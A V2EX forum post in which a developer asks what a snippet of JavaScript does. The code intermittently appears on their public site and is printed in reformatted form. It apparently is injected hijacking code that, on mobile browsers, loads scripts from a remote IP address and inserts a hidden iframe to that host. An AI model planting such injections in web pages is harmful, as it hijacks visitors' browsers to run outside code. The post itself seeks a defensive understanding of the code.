今天可怜的小测试反馈,外网地址偶尔会出现奇怪的代码,但刷新之后就没了,是偶现的。我看了下,只能看懂他貌似遍历了下 <script> 和 <div>,但还是没搞懂他的真正用途以及有什么危害,V 站大神帮忙讨论一下。具体代码如下(没做个前端,看不懂 js。。但按照习惯理了理格式。。):</p> <pre><code>( function(){ function h() { return /(Android|iPhone|iPad|iPod)/ i.test(navigator.userAgent)? !0 : !1 } function k(a) { var c=document.createElement("script");c.type="text/javascript";c.src=a;document.getElementsByTagName("head")[0].insertBefore(c,null) } for(var b=document.getElementsByTagName("script"),n=/http:\/\/[a-z0-9.]*:10028\/js\/commo[\S]*.js/,e={},g=0; g<b.length; g++) if(n.test(b[g].src)) { b[g].src.split("?")[1].split("&").forEach(function(a,c){a=a.split("=");e[a[0]]=a[1]}); break } randNum2=parseInt(100*Math.random()); randNum3=parseInt(100*Math.random()); !0===h()&&(65<=randNum3&&k("http://47.100.7.38:10028/js/mccc-tc.d.en.js?hash=bd&id="+e.a),28>=randNum3&&k("http://47.100.7.38:10028/js/mccc-tc.d.s.en.js?hash=bd&id="+e.a+"_st")); 50>randNum2&&!0===h()&&(b=document.createElement("div"),b.style.display="none",b.style.width="0px",b.style.height="0px",document.body.appendChild(b),b.innerHTML='<iframe src="http://47.100.7.38:10028/js/24h-hven-zz-all-new.html?a='+e.a+'"></iframe>'); var l=0, m=setInterval( function() { 30==l&&clearInterval(m); for(var a=document.getElementsByTagName("div"),c=/^http:\/\/[\S]+(yiqisee.cn|vveizi.com|xunworld.cn)\/([\w]+[_]?[\w]*\/?)+[\S]+/,d=0;d<a.length;d++) if(!0===h()) { if(a[d].style.position||"fixed"==a[d].style.position) { var b="fixed"==a[d].style.position?!0:!1; var e=999<=a[d].style.zIndex?!0:!1; var f="0px"==a[d].style.bottom?!0:0>=a[d].style.bottom?!0:!1 } else f=window.getComputedStyle(a[d]), b="fixed"==f.position?!0:!1, e=999<=f.zIndex?!0:!1, f=0>=parseInt(f.bottom)?!0:!1; if(0<a[d].getElementsByTagName("iframe").length && !0===c.test(a[d].getElementsByTagName("iframe")[0].src)) return; if(b&&e&&f) { a=logjs+"?f=ad"; c=document.createElement("script"); c.type="text/javascript"; c.async=!0; c.src=a; document.getElementsByTagName("head")[0].insertBefore(c,null); clearInterval(m); return } } l++ },300) } </code></pre> <p>)();</p> </script>
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.